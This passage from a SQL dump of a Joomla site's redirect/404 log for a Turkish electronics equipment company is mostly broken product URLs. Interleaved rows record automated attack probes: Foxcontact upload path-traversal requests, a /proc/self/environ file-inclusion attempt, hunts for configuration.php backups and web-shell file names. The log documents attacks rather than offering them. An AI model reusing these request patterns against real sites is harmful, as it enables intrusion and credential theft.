00:00:00',301),(20306,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',1,0,'2018-06-17 16:43:12','0000-00-00 00:00:00',301),(20307,'https://www.3s-technologies.com.tr/en/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/users-component/registration-form','',4,0,'2018-06-17 23:01:13','0000-00-00 00:00:00',301),(20308,'https://www.3s-technologies.com.tr/en/?option=com_easyblog&view=dashboard&layout=write',NULL,'https://www.3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',21,0,'2018-06-17 23:01:18','0000-00-00 00:00:00',301),(20309,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-10',NULL,'','',10,0,'2018-06-18 03:04:01','0000-00-00 00:00:00',301),(20310,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-20?language=en-gb',NULL,'','',6,0,'2018-06-18 11:04:00','0000-00-00 00:00:00',301),(20311,'http://3s-technologies.com.tr/tr/\'',NULL,'\'%27https://www.google.tm/search?q=site&oq=site&aqs=chrome%27\'69i60l4j69i65.1945j0j7&sourceid=chrome&ie=UTF-8\'%27','',1,0,'2018-06-19 00:26:56','0000-00-00 00:00:00',301),(20312,'http://3s-technologies.com.tr/tr/components/rxr.php',NULL,'','',1,0,'2018-06-20 14:18:26','0000-00-00 00:00:00',301),(20313,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/results,1-50',NULL,'','',5,0,'2018-06-21 03:55:21','0000-00-00 00:00:00',301),(20314,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2018-06-21 10:38:56','0000-00-00 00:00:00',301),(20315,'http://3s-technologies.com.tr/en/installation/index.php',NULL,'','',1,0,'2018-06-21 15:15:51','0000-00-00 00:00:00',301),(20316,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,1-20',NULL,'','',8,0,'2018-06-21 19:58:17','0000-00-00 00:00:00',301),(20317,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/le40v_400x214_150x150.jpg',NULL,'','',2,0,'2018-06-21 23:16:22','0000-00-00 00:00:00',301),(20318,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/sp18_150x150.jpg',NULL,'','',2,0,'2018-06-22 02:08:28','0000-00-00 00:00:00',301),(20319,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/npm_150x150.jpg',NULL,'','',1,0,'2018-06-22 05:35:20','0000-00-00 00:00:00',301),(20320,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/trident_full_view_150x150.jpg',NULL,'','',4,0,'2018-06-22 05:51:18','0000-00-00 00:00:00',301),(20321,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/ess-310-left-400x464_150x150.jpg',NULL,'','',4,0,'2018-06-22 08:14:53','0000-00-00 00:00:00',301),(20322,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux/by,ordering',NULL,'','',1,0,'2018-06-22 10:38:34','0000-00-00 00:00:00',301),(20323,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,1-50',NULL,'','',2,0,'2018-06-22 21:46:59','0000-00-00 00:00:00',301),(20324,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-06-23 02:49:45','0000-00-00 00:00:00',301),(20325,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering/results,1-5?language=en-gb',NULL,'','',1,0,'2018-06-23 14:56:40','0000-00-00 00:00:00',301),(20326,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/dirdesc/results,1-150',NULL,'','',1,0,'2018-06-23 15:35:03','0000-00-00 00:00:00',301),(20327,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-06-23 18:31:42','0000-00-00 00:00:00',301),(20328,'http://3s-technologies.com.tr/tr/��r��nler/manufacturers/panasonic',NULL,'','',6,0,'2018-06-23 23:04:05','0000-00-00 00:00:00',301),(20329,'http://3s-technologies.com.tr/tr/��r��nler/lehimleme-malzemeleri/krem-lehim',NULL,'','',11,0,'2018-06-23 23:04:16','0000-00-00 00:00:00',301),(20330,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��',NULL,'','',6,0,'2018-06-23 23:04:27','0000-00-00 00:00:00',301),(20331,'http://3s-technologies.com.tr/tr/��r��nler/b��lgesel-lehimleme',NULL,'','',5,0,'2018-06-23 23:04:38','0000-00-00 00:00:00',301),(20332,'http://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2018-06-23 23:04:51','0000-00-00 00:00:00',301),(20333,'http://3s-technologies.com.tr/tr/��r��nler/konveyorler',NULL,'','',7,0,'2018-06-23 23:05:03','0000-00-00 00:00:00',301),(20334,'http://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2018-06-23 23:05:28','0000-00-00 00:00:00',301),(20335,'http://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z/cm-602-l-detail',NULL,'','',7,0,'2018-06-23 23:05:50','0000-00-00 00:00:00',301),(20336,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2018-06-24 04:16:15','0000-00-00 00:00:00',301),(20337,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/results,1-10',NULL,'','',1,0,'2018-06-24 04:17:13','0000-00-00 00:00:00',301),(20338,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-06-24 04:19:00','0000-00-00 00:00:00',301),(20339,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc/results,1-20?language=en-gb',NULL,'','',3,0,'2018-06-24 10:24:57','0000-00-00 00:00:00',301),(20340,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/results,1-20',NULL,'','',1,0,'2018-06-24 17:40:17','0000-00-00 00:00:00',301),(20341,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,6-15',NULL,'','',13,0,'2018-06-24 18:52:34','0000-00-00 00:00:00',301),(20342,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/results,1-5',NULL,'','',2,0,'2018-06-25 12:39:03','0000-00-00 00:00:00',301),(20343,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,`p`.product_sku/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-06-25 13:20:04','0000-00-00 00:00:00',301),(20344,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',1,0,'2018-06-25 13:20:10','0000-00-00 00:00:00',301),(20345,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2018-06-25 13:48:30','0000-00-00 00:00:00',301),(20346,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,1-5',NULL,'','',1,0,'2018-06-25 13:49:25','0000-00-00 00:00:00',301),(20347,'http://3s-technologies.com.tr/en/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',2,0,'2018-06-25 15:39:37','0000-00-00 00:00:00',301),(20348,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/results,1-20',NULL,'','',2,0,'2018-06-26 10:20:45','0000-00-00 00:00:00',301),(20349,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/screen-printer/by,product_name/results,1-20',NULL,'','',1,0,'2018-06-26 10:21:28','0000-00-00 00:00:00',301),(20350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-20',NULL,'','',1,0,'2018-06-26 10:22:24','0000-00-00 00:00:00',301),(20351,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/results,1-5',NULL,'','',1,0,'2018-06-26 10:23:58','0000-00-00 00:00:00',301),(20352,'https://3s-technologies.com.tr/en/costofcial.com',NULL,'https://3s-technologies.com.tr/costofcial.com','',1,0,'2018-06-27 01:48:35','0000-00-00 00:00:00',301),(20353,'https://3s-technologies.com.tr/en/?option=com_easyblog&view=dashboard&layout=write',NULL,'https://3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',2,0,'2018-06-27 01:48:36','0000-00-00 00:00:00',301),(20354,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/_pagat.php',NULL,'','',4,0,'2018-06-27 18:05:23','0000-00-00 00:00:00',301),(20355,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic/components/com_foxcontact/_pagat.php',NULL,'','',4,0,'2018-06-27 18:05:27','0000-00-00 00:00:00',301),(20356,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,mf_name/dirdesc/results,1-15',NULL,'','',1,0,'2018-06-29 13:10:56','0000-00-00 00:00:00',301),(20357,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,mf_name/results,1-30',NULL,'','',1,0,'2018-06-29 13:15:22','0000-00-00 00:00:00',301),(20358,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/results,6-55',NULL,'','',1,0,'2018-07-01 00:36:52','0000-00-00 00:00:00',301),(20359,'https://3s-technologies.com.tr/tr/.well-known/assetlinks.json',NULL,'','',69,0,'2018-07-01 19:59:27','0000-00-00 00:00:00',301),(20360,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,mf_name/results,1-50',NULL,'','',1,0,'2018-07-01 22:45:10','0000-00-00 00:00:00',301),(20361,'http://3s-technologies.com.tr/tr/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.css','',1,0,'2018-07-02 03:28:54','0000-00-00 00:00:00',301),(20362,'http://3s-technologies.com.tr/en/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.css','',1,0,'2018-07-02 05:54:54','0000-00-00 00:00:00',301),(20363,'http://www.3s-technologies.com.tr/tr/logs/pagat.php',NULL,'','',11,0,'2018-07-02 13:00:11','0000-00-00 00:00:00',301),(20364,'http://www.3s-technologies.com.tr//components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:13','0000-00-00 00:00:00',301),(20365,'http://www.3s-technologies.com.tr//components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:16','0000-00-00 00:00:00',301),(20366,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=&cid=&mid=&owner=module&id=&qqfile=/../../../../logs/pagat.php',NULL,'','',2,0,'2018-07-02 13:00:20','0000-00-00 00:00:00',301),(20367,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic/logs/pagat.php',NULL,'','',11,0,'2018-07-02 13:00:20','0000-00-00 00:00:00',301),(20368,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=146&cid=146&mid=146&owner=module&id=146&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:20','0000-00-00 00:00:00',301),(20369,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=?cid=&mid=&qqfile=/../../../../logs/pagat.php',NULL,'','',2,0,'2018-07-02 13:00:21','0000-00-00 00:00:00',301),(20370,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:22','0000-00-00 00:00:00',301),(20371,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:22','0000-00-00 00:00:00',301),(20372,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:23','0000-00-00 00:00:00',301),(20373,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:23','0000-00-00 00:00:00',301),(20374,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=0?cid=0&mid=0&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:25','0000-00-00 00:00:00',301),(20375,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic//index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}?cid={}&mid={}&qqfile=/../../../../logs/pagat.php',NULL,'','',1,0,'2018-07-02 13:00:25','0000-00-00 00:00:00',301),(20376,'http://3s-technologies.com.tr/en/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',6,0,'2018-07-02 14:36:17','0000-00-00 00:00:00',301),(20377,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',1,0,'2018-07-02 16:06:29','0000-00-00 00:00:00',301),(20378,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc/results,1-20?language=en-gb&filter_product=',NULL,'','',1,0,'2018-07-02 16:08:20','0000-00-00 00:00:00',301),(20379,'http://3s-technologies.com.tr/tr/using-joomla/extensions/plugins/\'69-quick-icons\'',NULL,'','',1,0,'2018-07-04 15:11:04','0000-00-00 00:00:00',301),(20380,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-formgenerator/uploads/php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-formgenerator/uploads/php/','',3,0,'2018-07-05 12:12:28','0000-00-00 00:00:00',301),(20381,'http://3s-technologies.com.tr/tr/application/configs/application.ini',NULL,'','',5,0,'2018-07-05 16:43:29','0000-00-00 00:00:00',301),(20382,'http://3s-technologies.com.tr/tr/vulns.php',NULL,'','',2,0,'2018-07-05 16:43:38','0000-00-00 00:00:00',301),(20383,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/tool/bot.php3.g',NULL,'','',2,0,'2018-07-05 16:43:39','0000-00-00 00:00:00',301),(20384,'http://3s-technologies.com.tr/tr/media/izo.php.txt',NULL,'','',1,0,'2018-07-05 16:43:43','0000-00-00 00:00:00',301),(20385,'http://3s-technologies.com.tr/tr/media/izox.php',NULL,'','',1,0,'2018-07-05 16:43:43','0000-00-00 00:00:00',301),(20386,'http://3s-technologies.com.tr/tr/zxattacker.php?x=attacker',NULL,'','',2,0,'2018-07-05 16:43:47','0000-00-00 00:00:00',301),(20387,'http://3s-technologies.com.tr/tr/modules/mod_socialpinboard_menu/images/socialpinboard/temp/								<p><a href=\"/index.php',NULL,'','',2,0,'2018-07-05 16:43:49','0000-00-00 00:00:00',301),(20388,'http://3s-technologies.com.tr/tr/tmp/plupload/izo.php',NULL,'','',4,0,'2018-07-05 16:43:52','0000-00-00 00:00:00',301),(20389,'http://3s-technologies.com.tr/tr/tmp/plupload/izo.phtml',NULL,'','',2,0,'2018-07-05 16:43:53','0000-00-00 00:00:00',301),(20390,'http://3s-technologies.com.tr/tr/components/izoc.php',NULL,'','',2,0,'2018-07-05 16:43:56','0000-00-00 00:00:00',301),(20391,'http://3s-technologies.com.tr/tr/?option=com_k2&view=media&task=connector&cmd=file&target=l1_li4vy29uzmlndxjhdglvbi5waha=&download=1&token=1',NULL,'','',1,0,'2018-07-05 16:44:21','0000-00-00 00:00:00',301),(20392,'http://3s-technologies.com.tr/tr/images/shell.php',NULL,'','',4,0,'2018-07-05 16:44:24','0000-00-00 00:00:00',301),(20393,'http://3s-technologies.com.tr/tr/098.php',NULL,'','',5,0,'2018-07-05 16:44:24','0000-00-00 00:00:00',301),(20394,'http://3s-technologies.com.tr/tr/component/kunena',NULL,'http://3s-technologies.com.tr/tr/component/kunena','',1,0,'2018-07-08 19:58:25','0000-00-00 00:00:00',301),(20395,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2018-07-08 22:06:19','0000-00-00 00:00:00',301),(20396,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,ordering/results,1-5?language=en-gb',NULL,'','',1,0,'2018-07-08 22:07:04','0000-00-00 00:00:00',301),(20397,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/asp-300-detail',NULL,'','',1,0,'2018-07-08 22:08:28','0000-00-00 00:00:00',301),(20398,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,product_name/results,1-5',NULL,'','',4,0,'2018-07-09 20:38:58','0000-00-00 00:00:00',301),(20399,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',2,0,'2018-07-09 20:39:17','0000-00-00 00:00:00',301),(20400,'http://www.3s-technologies.com.tr/en/user',NULL,'','',2,0,'2018-07-09 23:45:16','0000-00-00 00:00:00',301),(20401,'http://3s-technologies.com.tr/tr/configuration.php-n',NULL,'','',1,0,'2018-07-10 01:55:41','0000-00-00 00:00:00',301),(20402,'http://3s-technologies.com.tr/tr/configuration.php-dist',NULL,'','',2,0,'2018-07-10 01:55:42','0000-00-00 00:00:00',301),(20403,'http://3s-technologies.com.tr/tr/configuration.php.bak',NULL,'','',8,0,'2018-07-10 01:55:44','0000-00-00 00:00:00',301),(20404,'http://3s-technologies.com.tr/tr/configuration.php~',NULL,'','',7,0,'2018-07-10 01:55:45','0000-00-00 00:00:00',301),(20405,'http://3s-technologies.com.tr/tr/configuration.php-backup1.txt',NULL,'','',1,0,'2018-07-10 01:55:46','0000-00-00 00:00:00',301),(20406,'http://3s-technologies.com.tr/tr/configuration.php fix.txt',NULL,'','',1,0,'2018-07-10 01:55:48','0000-00-00 00:00:00',301),(20407,'http://3s-technologies.com.tr/tr/configuration',NULL,'','',2,0,'2018-07-10 01:55:49','0000-00-00 00:00:00',301),(20408,'http://3s-technologies.com.tr/tr/configuration.phpold',NULL,'','',2,0,'2018-07-10 01:55:50','0000-00-00 00:00:00',301),(20409,'http://3s-technologies.com.tr/tr/configuration.phpnew',NULL,'','',1,0,'2018-07-10 01:55:53','0000-00-00 00:00:00',301),(20410,'http://3s-technologies.com.tr/tr/configuration.txt',NULL,'','',1,0,'2018-07-10 01:55:54','0000-00-00 00:00:00',301),(20411,'http://3s-technologies.com.tr/tr/configuration.phpa',NULL,'','',1,0,'2018-07-10 01:55:55','0000-00-00 00:00:00',301),(20412,'http://3s-technologies.com.tr/tr/configuration.old',NULL,'','',1,0,'2018-07-10 01:55:55','0000-00-00 00:00:00',301),(20413,'http://3s-technologies.com.tr/tr/configuration.php.txt',NULL,'','',1,0,'2018-07-10 01:55:56','0000-00-00 00:00:00',301),(20414,'http://3s-technologies.com.tr/tr/configuration.php.bak_old_host',NULL,'','',1,0,'2018-07-10 01:55:57','0000-00-00 00:00:00',301),(20415,'http://www.3s-technologies.com.tr/en/?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ\0',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00','',1,0,'2018-07-10 16:01:16','0000-00-00 00:00:00',301),(20416,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering',NULL,'','',4,0,'2018-07-11 01:53:28','0000-00-00 00:00:00',301),(20417,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/mirae',NULL,'','',5,0,'2018-07-11 03:51:56','0000-00-00 00:00:00',301),(20418,'http://3s-technologies.com.tr/en/assets/global/plugins/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/assets/global/plugins/jquery-file-upload/server/php/','',2,0,'2018-07-11 06:07:42','0000-00-00 00:00:00',301),(20419,'http://www.3s-technologies.com.tr/en/includes/u2p.php',NULL,'http://www.3s-technologies.com.tr/includes/u2p.php','',1,0,'2018-07-11 15:03:36','0000-00-00 00:00:00',301),(20420,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/konveyorler',NULL,'','',1,0,'2018-07-11 19:19:41','0000-00-00 00:00:00',301),(20421,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',2,0,'2018-07-11 19:40:44','0000-00-00 00:00:00',301),(20422,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',1,0,'2018-07-11 20:16:32','0000-00-00 00:00:00',301),(20423,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/anasayfa2/78-turkish-tr',NULL,'','',1,0,'2018-07-11 23:29:42','0000-00-00 00:00:00',301),(20424,'http://3s-technologies.com.tr/en/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.css','',1,0,'2018-07-12 07:07:42','0000-00-00 00:00:00',301),(20425,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/3s-technologies.com.tr/joomla/index.php/en/3s-technologies.com.tr/joomla/index.php/en/3s-technologies.com.tr/joomla/index.php/en/',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/','',1,0,'2018-07-12 09:13:41','0000-00-00 00:00:00',301),(20426,'http://3s-technologies.com.tr/en/modules/mod_cmscore/fuf.php',NULL,'3s-technologies.com.tr','',1,0,'2018-07-12 13:25:43','0000-00-00 00:00:00',301),(20427,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?error=404',NULL,'','',8,0,'2018-07-12 15:56:17','0000-00-00 00:00:00',301),(20428,'http://www.3s-technologies.com.tr/tr/index.php?option=com_foxcontact',NULL,'','',1,0,'2018-07-13 07:28:08','0000-00-00 00:00:00',301),(20429,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 07:28:09','0000-00-00 00:00:00',301),(20430,'http://www.3s-technologies.com.tr/tr/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=1&cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 07:28:11','0000-00-00 00:00:00',301),(20431,'http://www.3s-technologies.com.tr/tr/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=1&cid=1&mid=1&owner=module&id=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 07:28:12','0000-00-00 00:00:00',301),(20432,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 07:28:13','0000-00-00 00:00:00',301),(20433,'http://www.3s-technologies.com.tr/tr/components/com_jdownloads/jdownloads.php',NULL,'','',2,0,'2018-07-13 10:26:38','0000-00-00 00:00:00',301),(20434,'http://3s-technologies.com.tr/tr/index.php?option=com_foxcontact',NULL,'','',1,0,'2018-07-13 11:16:23','0000-00-00 00:00:00',301),(20435,'http://3s-technologies.com.tr/tr/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 11:16:24','0000-00-00 00:00:00',301),(20436,'http://3s-technologies.com.tr/tr/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=1&cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 11:16:26','0000-00-00 00:00:00',301),(20437,'http://3s-technologies.com.tr/tr/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=1&cid=1&mid=1&owner=module&id=1&qqfile=/../../git.php',NULL,'','',1,0,'2018-07-13 11:16:27','0000-00-00 00:00:00',301),(20438,'http://3s-technologies.com.tr/tr/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',2,0,'2018-07-13 11:16:28','0000-00-00 00:00:00',301),(20439,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux',NULL,'','',6,0,'2018-07-13 17:57:44','0000-00-00 00:00:00',301),(20440,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',8,0,'2018-07-13 17:58:29','0000-00-00 00:00:00',301),(20441,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/temizleme-makineleri',NULL,'','',5,0,'2018-07-13 17:59:33','0000-00-00 00:00:00',301),(20442,'http://3s-technologies.com.tr/tr/wp-content/plugins/custom-background/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/custom-background/uploadify/uploadify.css','',1,0,'2018-07-14 06:32:54','0000-00-00 00:00:00',301),(20443,'http://3s-technologies.com.tr/en/wp-content/plugins/custom-background/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/custom-background/uploadify/uploadify.css','',1,0,'2018-07-14 09:17:19','0000-00-00 00:00:00',301),(20444,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_sku/results,1-10',NULL,'','',1,0,'2018-07-15 22:21:06','0000-00-00 00:00:00',301),(20445,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-60?error=404',NULL,'','',9,0,'2018-07-16 04:15:45','0000-00-00 00:00:00',301),(20446,'http://www.3s-technologies.com.tr/en/wp-content/plugins/gravityforms',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/gravityforms/','',4,0,'2018-07-16 10:31:10','0000-00-00 00:00:00',301),(20447,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'3s-technologies.com.tr','',5,0,'2018-07-16 10:38:02','0000-00-00 00:00:00',301),(20448,'http://3s-technologies.com.tr/en/modules/_mod_bookmark/tmpl/default.php',NULL,'3s-technologies.com.tr','',1,0,'2018-07-16 10:40:17','0000-00-00 00:00:00',301),(20449,'http://3s-technologies.com.tr/wp-content/plugins/zen-mobile-app-native/server/images.php',NULL,'','',2,0,'2018-07-17 03:25:40','0000-00-00 00:00:00',301),(20450,'http://3s-technologies.com.tr/uploadify/uploadify.php?folder=/',NULL,'http://3s-technologies.com.tr/wp-admin/','',1,0,'2018-07-17 03:27:31','0000-00-00 00:00:00',301),(20451,'http://3s-technologies.com.tr/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php',NULL,'','',2,0,'2018-07-17 03:37:08','0000-00-00 00:00:00',301),(20452,'http://3s-technologies.com.tr/wp-content/plugins/asset-manager/upload.php',NULL,'','',2,0,'2018-07-17 03:42:40','0000-00-00 00:00:00',301),(20453,'http://www.3s-technologies.com.tr/tr/images/stories/explore.gif',NULL,'','',6,0,'2018-07-17 08:02:42','0000-00-00 00:00:00',301),(20454,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component//images/stories/explore.gif',NULL,'','',3,0,'2018-07-17 08:02:58','0000-00-00 00:00:00',301),(20455,'http://3s-technologies.com.tr/en/media/mod_pwebcontact/css/form/blue.css',NULL,'3s-technologies.com.tr','',1,0,'2018-07-17 10:50:03','0000-00-00 